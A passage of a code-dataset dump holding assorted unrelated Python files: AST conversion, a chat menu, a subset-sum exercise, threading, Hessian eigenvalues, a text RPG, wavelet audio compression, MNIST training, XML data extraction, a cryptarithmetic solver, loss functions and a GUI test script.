is_builtin_type(target):\n        # Builtin-type\n        if type(target) == bytes:\n            return ast.Leaf(type(target).__name__, target.decode())\n        else:\n            return ast.Leaf(type(target).__name__, str(target))\n\n    for chname, chval in python_ast.iter_fields(target):\n        if chname == \"ctx\":\n            # ctx is omitted\n            continue\n\n        is_list = isinstance(chval, list)\n        if chval is None:\n            continue\n\n        if is_list:\n            if len(chval) == 0:\n                base_type = python_ast.AST.__name__\n                is_leaf = False\n            else:\n                base_type = base_ast_type(chval[0]).__name__\n                is_leaf = is_builtin_type(chval[0])\n\n            if is_leaf:\n                parent_type = f\"{base_type}__list\"\n            else:\n                parent_type = base_type\n\n            elements: List[ast.Node] = []\n            for i, elem in enumerate(chval):\n                c = to_ast(elem)\n                if isinstance(c, ast.Leaf):\n                    c = ast.Node(\n                        parent_type, [ast.Field(\"token\", base_type, c)])\n                elements.append(c)\n            fields.append(ast.Field(chname, parent_type, elements))\n        else:\n            base_type = base_ast_type(chval).__name__\n            fields.append(ast.Field(chname, base_type,\n                                    to_ast(chval)))\n    return ast.Node(type_name, 
fields)\n","sub_path":"nl2prog/language/python/python_ast_to_ast.py","file_name":"python_ast_to_ast.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"185823469","text":"from Pychat.database.checkdestination import check_destination\nfrom Pychat.database.get_messages import get_messages\nfrom Pychat.database.update_msg_status import update_msg_status\nfrom Pychat.exceptions import InvalidChoiceException\n\nfrom Pychat.functionality.new_chat import new_chat\n\n'''CHAT MODULE '''\ndef check_my_chats(usr):\n f=True\n while(f==True):\n sender=get_messages(usr)\n count=len(sender)\n li=[]\n ct=[]\n chat_no=''\n ''' for i in sender.keys():\n Sender Number/Name\n li.append(i)\n #Count of respective Unread messages\n ct.append(sender[i])'''\n\n for i in range(0,count):\n print (i)\n #msg=check_destination(li[i])\n #if(ct[i]==0):\n # print(i+1,\".\",msg.get_dis_name())\n #else:\n # print(i+1,\".\",msg.get_dis_name(),\"[\",ct[i],\"]\")\n print(sender)\n print((count+1),\". New Chat\")\n print((count+2),\". Exit\\n\")\n choice=raw_input()\n try:\n choice=int(choice)\n except ValueError:\n raise InvalidChoiceException()\n if(choice<=count):\n chat_no=li[choice-1]\n new_chat(usr,chat_no)\n update_msg_status(usr,str(chat_no))\n check_my_chats(usr)\n f=False\n elif(choice==count+1):\n\n new_chat(usr)\n check_my_chats(usr)\n f=False\n\n update_msg_status(usr,str(chat_no))\n elif(choice==count+2):\n f=False\n else:\n print(\"Enter a valid option\")","sub_path":"Pychat/functionality/check_my_chats.py","file_name":"check_my_chats.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"298436588","text":"\"\"\"\nSolução dinamica do subset sum\n\"\"\"\n\ndef subset_sum_dinamico(lista, capacidade):\n def subset_sum(lista, capacidade, storage=()):\n for _ in lista:\n if not lista:\n return False\n if lista[0] == capacidade:\n return list(storage + (lista[0],))\n storage = storage + (lista[0],)\n capacidade = capacidade - lista[0]\n lista = lista[1:]\n while True:\n result = subset_sum(lista, capacidade)\n if result == False or result == None:\n lista = lista[1:]\n else:\n return result\n##########################################################################\n##########################################################################\n\ndef red(str):\n return '\\033[91m' + str + '\\033[0m'\n\n\ndef main():\n print(\n \"\"\"\n Gilberto Charles Silveira Araújo - 1512130109\n Erika Bianca Csan - 1612082057\n\n Entre com a {capacidade}, enter, e em seguida, a {lista}, com itens separados por espaços:\n \"\"\"\n .format(\n capacidade=red('capacidade'),\n lista=red('lista')))\n\n capacidade = int(input('\\t{capacidade}'.format(capacidade=red('capacidade ')))) # Entrada da capacidade\n\n # Pré otimização: Eu já recebo a lista de forma ordenada\n lista = sorted(\n list(map(int, input('\\t{lista}'.format(lista=red('lista '))).split(\" \"))))\n\n # Pré otimização: Com a lista ordenada, eu crio uma nova lista sem os\n # itens maiores que a capacidade\n if lista[len(lista) - 1] > capacidade:\n lista = lista[0:next(i for i, x in enumerate(lista) if x > capacidade)]\n\n # Agora sim, eu chamo minha função\n subconjunto = subset_sum_dinamico(lista, capacidade)\n print(\n \"\"\"\n {resposta} {subconjunto}\n \"\"\".format(\n resposta=red(\n 'Subconjunto encontrado:'),\n subconjunto=subconjunto\n ))\n\nif __name__ == \"__main__\":\n 
main()","sub_path":"2020_1/analise_de_algoritmo/correcaoa1/gilberto_araujo/subset_sum_dinamico.py","file_name":"subset_sum_dinamico.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"264627803","text":"import threading\nimport time\nimport random\n\n_queue = [] # NOT THREAD SAFE\nMAX_ITEMS = 10\ncondition = threading.Condition()\n\n\nclass ProducerThread(threading.Thread):\n def run(self):\n numbers = range(MAX_ITEMS) # Generate num in 0..5\n global _queue # Global queue\n\n while True:\n condition.acquire()\n if len(_queue) >= MAX_ITEMS:\n print(\"Queue is full, producer is waiting\")\n condition.wait() # If full, just wait\n print(\"Space in queue, Consumer notified producer\")\n number = random.choice(numbers)\n _queue.append(number)\n print(\"Produced {}, queue: {}\".format(number, _queue))\n condition.notify() # Notify consumers\n condition.release()\n time.sleep(random.random())\n\n\nclass ConsumerThread(threading.Thread):\n def run(self):\n global _queue\n while True:\n condition.acquire()\n if not _queue:\n print(\"Nothing in queue, consumer is waiting\")\n condition.wait()\n print(\"Producer added something to queue and notified consumer\")\n number = _queue.pop(0)\n print(\"Consumed {}, queue: {}\".format(number, _queue))\n condition.notify() # Notify producer\n condition.release()\n time.sleep(random.random())\n\nif __name__ == \"__main__\":\n producer = ProducerThread()\n producer.daemon = True\n producer.start()\n\n consumer = ConsumerThread()\n consumer.daemon = True\n consumer.start()\n\n producer.join()\n consumer.join()","sub_path":"pure_python_part/consumer_producer_conditional_mutex.py","file_name":"consumer_producer_conditional_mutex.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"652344047","text":"\"\"\"\n compute hessian vector products as well as eigenvalues of the hessian\n # copied from https://github.com/tomgoldstein/loss-landscape/blob/master/hess_vec_prod.py\n # code re-written to use gpu by default and then to use gpytorch\n\"\"\"\n\nimport torch\nimport time\nimport numpy as np\nfrom torch import nn\nfrom torch.autograd import Variable\n\nfrom gpytorch.utils.lanczos import lanczos_tridiag, lanczos_tridiag_to_diag\n\nfrom hess.utils import flatten, unflatten_like, eval_hess_vec_prod, gradtensor_to_tensor\n\n################################################################################\n# For computing Eigenvalues of Hessian\n################################################################################\ndef min_max_hessian_eigs(net, dataloader, criterion,\n n_top_eigs=3, n_bottom_eigs=50, use_cuda=False):\n \"\"\"\n Compute the largest and the smallest eigenvalues of the Hessian marix.\n Args:\n net: the trained model.\n dataloader: dataloader for the dataset, may use a subset of it.\n criterion: loss function.\n use_cuda: use GPU\n \"\"\"\n\n params = [p for p in net.parameters() if len(p.size()) > 1]\n N = sum(p.numel() for p in net.parameters())\n p = next(iter(net.parameters()))\n mask = torch.ones(N, dtype=p.dtype, device=p.device)\n \n def hess_vec_prod(vec):\n padded_rhs = torch.zeros(N, vec.shape[-1],\n device=vec.device, dtype=vec.dtype)\n padded_rhs[mask==1] = vec\n \n print(\"vec shape = \", vec.shape)\n print(\"padded shape = \", padded_rhs.shape)\n hess_vec_prod.count += 1 # simulates a static variable\n padded_rhs = 
unflatten_like(padded_rhs.t(), net.parameters())\n\n        start_time = time.time()\n        eval_hess_vec_prod(padded_rhs, net=net, criterion=criterion,\n                           dataloader=dataloader,\n                           use_cuda=use_cuda)\n        prod_time = time.time() - start_time\n        out = gradtensor_to_tensor(net, include_bn=True)\n\n        sliced = out[mask==1].unsqueeze(-1)\n        return sliced\n\n    hess_vec_prod.count = 0\n\n    # use lanczos to get the t and q matrices out\n    pos_q_mat, pos_t_mat = lanczos_tridiag(\n        hess_vec_prod,\n        n_top_eigs,\n        device=params[0].device,\n        dtype=params[0].dtype,\n        matrix_shape=(N, N),\n    )\n    # convert the tridiagonal t matrix to the eigenvalues\n    pos_eigvals, pos_eigvecs = lanczos_tridiag_to_diag(pos_t_mat)\n\n    pos_eigvecs = pos_q_mat @ pos_eigvecs\n\n    # If the largest eigenvalue is positive, shift matrix so that any negative eigenvalue is now the largest\n    # We assume the smallest eigenvalue is zero or less, and so this shift is more than what we need\n    shift = 0.51 * pos_eigvals.max().item()\n    print(\"Pos Eigs Computed....\\n\")\n\n    def shifted_hess_vec_prod(vec):\n        hvp = hess_vec_prod(vec)\n        return -hvp + shift * vec\n\n\n    # now run lanczos on the shifted eigenvalues\n    neg_q_mat, neg_t_mat = lanczos_tridiag(\n        shifted_hess_vec_prod,\n        n_bottom_eigs,\n        device=params[0].device,\n        dtype=params[0].dtype,\n        matrix_shape=(N, N),\n    )\n    neg_eigvals, neg_eigvecs = lanczos_tridiag_to_diag(neg_t_mat)\n    neg_eigvecs = neg_q_mat @ neg_eigvecs\n    print(\"Neg Eigs Computed...\")\n    print(\"neg eigs = \", neg_eigvals)\n\n    # undo the shift to recover the actual (most negative) eigenvalues\n    neg_eigvals = -neg_eigvals + shift\n\n    return pos_eigvals, pos_eigvecs, neg_eigvals, neg_eigvecs\n","sub_path":"experiments/cifar-loss-surfaces/min_max_evals.py","file_name":"min_max_evals.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"184827760","text":"#!/usr/bin/env python3\n\n\"\"\"\nIn this simple RPG game, the hero fights the goblin. He has the options to:\n\n1. fight goblin\n2. do nothing - in which case the goblin will attack him anyway\n3. 
flee\n\n\"\"\"\n#Step 6\nclass Character:\n def __init__(self,name, health, power):\n self.name = name\n self.health = health\n self.power = power\n#Step 7\n def alive(self):\n if self.health > 0:\n return True\n\n#Step 7 - Challenge\n def attack(self, enemy):\n enemy.health -= self.power\n\n\n def print_status(self):\n print(\"{} have {} health and {} power.\".format(self.name, self.health, self.power))\n\n#Step 1\nclass Hero(Character):\n def attack(self, goblin):\n super().attack(goblin)\n print(\"You do {} damage to the goblin.\".format(self.power))\n if goblin.health <= 0:\n print(\"The goblin is dead.\")\n\n def attackz(self, zombie):\n super().attack(zombie)\n print(\"You do {} damage to the zombie.\".format(self.power))\n print(\"He is still alive, better flee\")\n\n\nclass Goblin(Character):\n def attack(self, hero):\n super().attack(hero)\n print(\"The goblin does {} damage to you.\".format(goblin.power))\n if hero.health <= 0:\n print(\"You are dead.\")\n\nclass Zombie(Character):\n def attack(self, hero):\n super().attack(hero)\n print(\"The zombie does {} damage to you.\".format(zombie.power))\n if hero.health <= 0:\n print(\"You are dead.\")\n\nhero = Hero('You', 10, 2)\ngoblin = Goblin('Goblin', 6, 2)\nzombie = Zombie('Zombie', 1, 1)\n\ndef main():\n while goblin.alive() and hero.alive():\n hero.print_status()\n goblin.print_status()\n # zombie.print_status()\n print()\n print(\"What do you want to do?\")\n print(\"1. fight goblin\")\n print(\"2. do nothing\")\n print(\"3. flee\")\n print(\"4. fight zombie\")\n print(\"> \", end=' ')\n inpt = input()\n if inpt == \"1\":\n hero.attack(goblin)\n\n if goblin.health > 0:\n goblin.attack(hero)\n elif inpt == \"2\":\n if goblin.health > 0:\n goblin.attack(hero)\n elif inpt == \"3\":\n print(\"Goodbye.\")\n break\n elif inpt == \"4\":\n hero.attackz(zombie)\n\n if zombie.health > 0:\n zombie.attack(hero)\n else:\n print(\"Invalid inpt {}\".format(inpt))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"clearhero.py","file_name":"clearhero.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"401967034","text":"import numpy as np\nimport sounddevice as sd\nimport pywt as wt\nimport math\nimport struct\nimport zlib\ntry:\n import argcomplete # completion for argparse.\nexcept ImportError:\n print(\"Unable to import argcomplete\")\nimport minimal\nimport buffer\nimport compress\nimport br_control\nimport intra_frame_decorrelation\n\nclass Temporal_decorrelation(intra_frame_decorrelation.Intra_frame_decorrelation):\n def __init__(self):\n if __debug__:\n print(\"Running Intra_frame_decorrelation.__init__\")\n filters_name = \"db5\"\n self.wavelet = wt.Wavelet(filters_name)\n self.levels = 3\n self.signal_mode_extension = \"per\"\n self.precision_type = np.int32 \n super().__init__()\n \n def pack(self, chunk_number, chunk):\n decomposition = self.DWT(chunk)\n quantized_decomposition = []\n for subband in decomposition:\n quantized_subband = self.quantize(subband)\n quantized_decomposition.append(quantized_subband)\n \n packed_chunk = super().pack(chunk_number, quantized_decomposition)\n return packed_chunk\n\n def unpack(self, packed_chunk, dtype=minimal.Minimal.SAMPLE_TYPE):\n chunk_number, decomposition = super().unpack(packed_chunk, dtype)\n \n dequantized_decomposition = []\n for subband in decomposition:\n dequantized_subband = self.dequantize(subband)\n dequantized_decomposition.append(dequantized_subband)\n \n dwted_chunk = 
self.iDWT(dequantized_decomposition)\n        return chunk_number, dwted_chunk\n    \n    def DWT(self, chunk):\n        return wt.wavedec(chunk, wavelet=self.wavelet, level=self.levels, mode=self.signal_mode_extension)\n        #return np.around(wt.coeffs_to_array(coeffs_in_subbands)[0]).astype(self.precision_type)\n\n    def iDWT(self, decomposition):\n        # inverse multilevel transform back to a time-domain chunk;\n        # array_to_coeffs serves a different purpose, so waverec is used here\n        return wt.waverec(decomposition, wavelet=self.wavelet, mode=self.signal_mode_extension)\n\nif __name__ == \"__main__\":\n    minimal.parser.description = __doc__\n    try:\n        argcomplete.autocomplete(minimal.parser)\n    except Exception:\n        if __debug__:\n            print(\"argcomplete not working :-/\")\n        else:\n            pass\n    minimal.args = minimal.parser.parse_known_args()[0]\n    intercom = Temporal_decorrelation()\n    try:\n        intercom.run()\n    except KeyboardInterrupt:\n        minimal.parser.exit(\"\\nInterrupted by user\")","sub_path":"2021/G2/temporal.py","file_name":"temporal.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"449412321","text":"import torch  # torch itself is needed below (no_grad, save, load, utils.data)\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.optim import lr_scheduler\nimport torchvision\nimport torchvision.transforms as transforms\nimport os\nfrom models.conv import MnistModel\nfrom settings import *\n\n# Training\ndef train(epoch):\n    print('\\nEpoch: %d' % epoch)\n    scheduler.step()\n    net.train()\n    train_loss = 0\n    correct = 0\n    total = 0\n    for batch_idx, (inputs, targets) in enumerate(trainloader):\n        inputs, targets = inputs.to(device), targets.to(device)\n        optimizer.zero_grad()\n        outputs = net(inputs)\n        loss = criterion(outputs, targets)\n        loss.backward()\n        optimizer.step()\n\n        train_loss += loss.item()\n        _, predicted = outputs.max(1)\n        total += targets.size(0)\n        correct += predicted.eq(targets).sum().item()\n    acc = 100. 
* correct / total\n    print('train acc: %.2f' % acc)\n\ndef test(epoch):\n    global best_acc\n    net.eval()\n    test_loss = 0\n    correct = 0\n    total = 0\n    with torch.no_grad():\n        for batch_idx, (inputs, targets) in enumerate(testloader):\n            inputs, targets = inputs.to(device), targets.to(device)\n            outputs = net(inputs)\n            loss = criterion(outputs, targets)\n\n            test_loss += loss.item()\n            _, predicted = outputs.max(1)\n            total += targets.size(0)\n            correct += predicted.eq(targets).sum().item()\n\n    # Save checkpoint.\n    acc = 100.*correct/total\n    print('valid acc: %.2f' % acc)\n    if acc >= best_acc:\n        print('update mnist ckpt!')\n        state = {\n            'net': net.state_dict(),\n            'acc': acc,\n            'epoch': epoch,\n        }\n        if not os.path.isdir('checkpoint'):\n            os.mkdir('checkpoint')\n        torch.save(state, MNIST_CKPT)\n        best_acc = acc\n\n\nif __name__ == '__main__':\n    best_acc = 0  # best test accuracy\n    start_epoch = 0  # start from epoch 0 or last checkpoint epoch\n\n    # Data\n    print('==> Preparing data..')\n    transform_train = transforms.Compose([\n        transforms.RandomHorizontalFlip(),\n        transforms.ToTensor(),\n    ])\n\n    transform_test = transforms.Compose([\n        transforms.ToTensor(),\n    ])\n\n    trainset = torchvision.datasets.MNIST(root='./data', train=True, download=True, transform=transform_train)\n    trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH_SIZE_MNIST, shuffle=True,\n                                              num_workers=NUM_WORKERS)\n\n    testset = torchvision.datasets.MNIST(root='./data', train=False, download=True, transform=transform_test)\n    testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH_SIZE_MNIST, shuffle=False,\n                                             num_workers=NUM_WORKERS)\n\n    # Model\n    print('==> Building model..')\n    net = MnistModel()\n    net = net.to(device)\n    #\n    # if device == 'cuda':\n    #     net = torch.nn.DataParallel(net)\n    #     cudnn.benchmark = True\n\n    if False:  # flip to True to resume from MNIST_CKPT\n        # Load checkpoint.\n        print('==> Resuming from checkpoint..')\n        assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n        checkpoint = torch.load(MNIST_CKPT)\n        net.load_state_dict(checkpoint['net'])\n        try:\n            best_acc = checkpoint['acc']\n        except KeyError:\n            best_acc = checkpoint['auc_score']\n        if best_acc > 90:\n            best_acc = best_acc / 100\n        print('best_acc: %.2f%%' % (100. 
* best_acc))\n start_epoch = checkpoint['epoch']\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE, momentum=0.9, weight_decay=5e-4)\n scheduler = lr_scheduler.StepLR(optimizer, step_size=SCHEDULER_STEP_SIZE, gamma=0.1)\n\n for epoch in range(start_epoch, start_epoch+NUM_EPOCHS):\n train(epoch)\n test(epoch)\n\n","sub_path":"mnist_pre_train.py","file_name":"mnist_pre_train.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"27151318","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 17:44:50 2019\n\n@author: ouhajime\n\"\"\"\n\nimport xml.dom.minidom\nimport pandas as pd\n\ndef extractData(file_path):\n \"\"\"\n extract data from xml file\n \"\"\"\n \n DOMTree = xml.dom.minidom.parse(file_path)\n collection = DOMTree.documentElement\n \n data = []\n sents = collection.getElementsByTagName(\"sentence\") \n for sent in sents:\n aspectTerms = sent.getElementsByTagName('aspectTerms')\n if len(list(aspectTerms)):\n \n text = sent.getElementsByTagName(\"text\")[0]\n temp = text.childNodes[0].data\n \n aspectTerm = aspectTerms[0].getElementsByTagName(\"aspectTerm\")\n for ap in aspectTerm:\n content = []\n content.append(temp)\n content.append(ap.getAttribute(\"term\"))\n content.append(ap.getAttribute(\"polarity\"))\n data.append(content)\n \n df = pd.DataFrame(data,columns=['text','target','label'])\n df = df[df['label'] != 'conflict']\n \n return df\n\ndef saveData(input_path,save_path):\n df = extractData(input_path)\n df.to_csv(save_path,index=False)\n\nif __name__ == \"__main__\":\n\n saveData('./DATA/Restaurants_Train.xml','./DATA/train.csv')\n saveData('./DATA/restaurants-trial.xml','./DATA/test.csv')\n\n\n\n\n\n\n\n\n","sub_path":"GetData.py","file_name":"GetData.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"450132842","text":"# again!! 
will do in cpp later.\n\n#!/usr/bin/python3\nnum = 2**1000\nnum_str = str(num)\n\nsum = 0\nfor i in range(len(num_str)) :\n sum = sum + int(num_str[i])\n\nprint(sum)","sub_path":"Problem_16.py","file_name":"Problem_16.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"572888725","text":"import time\r\n\r\ndef print_problem(str_operand, str_result):\r\n\t#menampilkan ke layar persoalan cryptaritmetic\r\n\tfor i in range(len(str_operand)):\r\n\t\tfor j in range(len(str_result)-len(str_operand[i])):\r\n\t\t\tprint(' ', end='')\r\n\t\tprint(str_operand[i])\r\n\tfor i in range(len(str_result)):\r\n\t\tprint('-', end='')\r\n\tprint(' +')\r\n\tprint(str_result)\r\n\r\ndef print_solution(str_operand, str_result, dictionary):\r\n\t#menampilkan ke layar solusi cryptarithmetic\r\n\tx_operand = []\r\n\tfor i in range(len(str_operand)):\r\n\t\tx_operand.append(str(get_value(str_operand[i], dictionary)))\r\n\tx_result = str(get_value(str_result, dictionary))\r\n\tprint_problem(x_operand, x_result)\r\n\r\ndef input_letters(stream, letters):\r\n\t#memasukan huruf dari operand atau hasil ke dalam list letters, sehingga tercipta huruf yang unik\r\n for i in range(len(stream)):\r\n if stream[i] not in letters:\r\n letters = letters + stream[i]\r\n return letters\r\n\r\ndef get_value(stream, dictionary):\r\n\t#mendapatkan nilai dari suatu operand atau hasil berdasarkan kamus / kemungkinan permutasi yang sedang dilakukan\r\n s = ''\r\n for letter in stream:\r\n s += dictionary[letter]\r\n return int(s)\r\n\r\ndef check_format(str_operand, str_result, dictionary):\r\n\t#mengecek apakah huruf pertama dari operand atau hasil ada yang nol, jika ada return False, jika tidak return True \r\n\tif dictionary[str_result[0]] == '0':\r\n\t\treturn False\r\n\telse:\r\n\t\ti = 0\r\n\t\twhile i < len(str_operand): \r\n\t\t\tif dictionary[str_operand[i][0]] == '0':\r\n\t\t\t\treturn False\r\n\t\t\telse :\r\n\t\t\t\ti += 1\r\n\t\treturn True\r\n\r\ndef check_solution(str_operand, str_result, str_first, letters):\r\n\t#mengecek apakah solusi tersebut memenuhi \r\n\tdictionary = dict(zip(letters, '0123456789'))\r\n\tif not letters[0] in str_first and sum(get_value(exp, dictionary) for exp in str_operand) == get_value(str_result, dictionary):\r\n\t\tprint('Cryptarithmetic Solution : ')\r\n\t\tprint_solution(str_operand, str_result, dictionary)\r\n\t\tprint()\r\n\t\treturn True\r\n\telse :\r\n\t\treturn False\r\n\r\n\"\"\"\r\nMembaca data dari file eksternal\r\nOperand dimasukan ke dalam list str_operand\r\nResult dimasukan ke dalam string str_result\r\nHuruf dimasukan ke dalam string letters, lalu diubah menjadi list letters\r\nHuruf pertama dimasukkan ke dalam set str_first\r\n\"\"\"\r\n# data_loading\r\ndata = open('expression.txt', 'r')\r\nstr_operand =[]\r\nletters = ''\r\nstream = data.readline()\r\nwhile '-' not in stream:\r\n stream = stream.replace('\\n', '')\r\n stream = stream.replace('+', '')\r\n stream = stream.replace(' ', '')\r\n str_operand.append(stream)\r\n letters = input_letters(stream, letters)\r\n stream = data.readline()\r\nstream = data.readline()\r\nstream = stream.replace('\\n', '')\r\nletters = input_letters(stream, letters)\t\r\nstr_result = stream\r\ndata.close()\r\nstr_first = []\r\nfor i in range(len(str_operand)):\r\n\tstr_first.append(str_operand[i][0])\r\nstr_first.append(str_result[0])\r\nstr_first= set(str_first)\r\n\r\nfor i in range(10-len(letters)):\r\n letters = letters + '_'\r\n \r\nr_letters 
= sorted(letters)\r\nr_letters.reverse()\r\nletters = sorted(letters)\r\n\r\n# problem description\r\nprint('Cryptarithmetic Problem : ')\r\nprint_problem(str_operand, str_result)\r\nprint()\r\n\r\n#problem solving\r\nif len(letters) > 10:\r\n\tprint('Cryptarithmetic problem has no solution, n_letters > 10')\r\nelse :\r\n\tsolution = False\r\n\tt0 = time.clock()\r\n\r\n\twhile r_letters != letters:\r\n\t\tif check_solution(str_operand, str_result, str_first, letters):\r\n\t\t\tsolution = True\r\n\t\t\tbreak\r\n\t\ti = len(letters)-1\r\n\t\twhile i > 0 :\r\n\t\t\tif letters[i] > letters[i-1]:\r\n\t\t\t\tj = len(letters)-1\r\n\t\t\t\twhile letters[j]')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)","sub_path":"dogclassifierapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"441490039","text":"import torch as t\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass SoftDiceLoss(nn.Module):\n def __init__(self):\n super(SoftDiceLoss, self).__init__()\n\n def forward(self, logits, targets):\n smooth = 1\n num = targets.size(0)\n probs = t.sigmoid(logits)\n\n m1 = probs.view(num, -1)\n m2 = targets.view(num, -1)\n intersection = (m1 * m2)\n\n score = 2. * (intersection.sum(1) + smooth) / (m1.sum(1) + m2.sum(1) + smooth) # sum(1) sum by column\n\n score = 1 - score.sum() / num\n\n return score\n\n\nclass DetaLoss(nn.Module):\n def __init__(self):\n super(DetaLoss, self).__init__()\n\n def forward(self, pred, truth):\n points = t.abs(pred - truth)\n # for i in range(len(points)):\n # while points[i][0] > 1 or points[i][1] > 1:\n # points[i][0] /= 2\n # points[i][1] /= 2\n return t.mean(t.mean(points, 0, keepdim=True), 1)\n","sub_path":"ex21-Weights/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"334450332","text":"useFixture(default)\r\n\r\ndef test():\r\n\tfrom Modules import commonBits\r\n\tjava_recorded_version = '1.6.0_22'\r\n\r\n\tif window('Record Layout Definitions'):\r\n\t\tclick('*')\r\n\t\tcommonBits.new1(click)\r\n\r\n\t\tselect('RecordDef.Record Name_Txt', 'zxzxzFLDg1')\r\n\t\tselect('RecordDef.Description_Txt', 'Group Test 1')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('RecordFieldsJTbl', 'cell:' + commonBits.fl('FieldName') + ',0()')\r\n\t\tcommonBits.delete2(click)\r\n\t\tselect('RecordDef.Record Type_Txt', commonBits.fl('Group of Records'))\r\n\r\n\t\t##select('TabbedPane', 'Child Records')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',0()')\r\n\t\tselect('ChildRecordsJTbl', 'zxzxzFLD1', commonBits.fl('Child Record') + ',0')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',0(zxzxzFLD1)')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',1()')\r\n\t\tselect('ChildRecordsJTbl', 'zxzxzFLD2', commonBits.fl('Child Record') + ',1')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',1(zxzxzFLD2)')\r\n\t\tclick(commonBits.fl('Insert'))\r\n\r\n\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',2()')\r\n\t\tselect('ChildRecordsJTbl', 'zxzxzFLD3', commonBits.fl('Child Record') + ',2')\r\n\t\tselect('ChildRecordsJTbl', 
'cell:' + commonBits.fl('Child Record') + ',2(zxzxzFLD3)')\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Record') + ',2(zxzxzFLD3)')\r\n\t\tclick(commonBits.fl('Save As'))\r\n\r\n\r\n\r\n\t\tif window('Input'):\r\n\t\t\tselect('OptionPane.textField', 'zxzxzFLDg2')\r\n\t\t\tclick('OK')\r\n\t\tclose()\r\n\r\n\r\n\t\t##select('TabbedPane', 'Child Records')\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tselect('RecordDef.Description_Txt', 'Group Test 2')\r\n\t\tselect('ChildRecordsJTbl', 'cell:' + commonBits.fl('Child Name') + ',1()')\r\n\t\tcommonBits.delete2(click)\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tselect('RecordList.Record Name_Txt', 'zxzxzFLDg1')\r\n\r\n\t\t#select('TabbedPane', commonBits.fl('Child Records'))\r\n\t\tselect('RecordList.Description_Txt', '%')\r\n\r\n\t\t##select('TabbedPane', 'Child Records')\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tassert_p('RecordDef.Description_Txt', 'Text', 'Group Test 1')\r\n\t\tassert_p('RecordDef.Record Name_Txt', 'Text', 'zxzxzFLDg1')\r\n\t\tselect('RecordList.Record Name_Txt', 'zxzxzFLDg2')\r\n\r\n\t\t#select('TabbedPane', 'Child Records')\r\n\t\tselect('RecordList.Description_Txt', '%%')\r\n\r\n\t\tselect('TabbedPane', commonBits.fl('Child Records'))\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tassert_p('RecordDef.Description_Txt', 'Text', 'Group Test 2')\r\n\t\tassert_p('RecordDef.Record Name_Txt', 'Text', 'zxzxzFLDg2')\r\n\t\tcommonBits.delete3(click)\r\n\t\tif window(commonBits.fl('Delete: zxzxzFLDg2')):\r\n\t\t\tclick('Yes')\r\n\t\tclose()\r\n\r\n\r\n\t\tselect('RecordList.Record Name_Txt', 'zxzxzFLDg1')\r\n\r\n\t\tselect('RecordList.Description_Txt', '%')\r\n\r\n\t\tselect('TabbedPane', commonBits.fl('Child Records'))\r\n\t\tassert_p('ChildRecordsJTbl', 'Content', '[[, zxzxzFLD1, , , , , ], [, 